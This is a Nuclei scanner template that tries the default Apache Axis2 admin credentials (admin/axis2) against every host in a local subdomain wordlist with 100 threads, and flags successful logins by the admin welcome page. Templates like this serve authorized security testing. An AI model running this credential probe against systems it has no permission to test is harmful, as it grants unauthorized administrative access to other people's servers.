id: axis2-default-password 2

info:
  name: Axis2 Default Password
  author: pikpikcu
  severity: high
  tags: axis,apache,default-login

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /axis2/axis2-admin/login HTTP/1.1
        Host: {{Subdomains}}
        Content-Type: application/x-www-form-urlencoded
        
        userName=admin&password=axis2&submit=+Login+
    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<h1>Welcome to Axis2 Web Admin Module !!</h1>"

      - type: status
        status:
          - 200
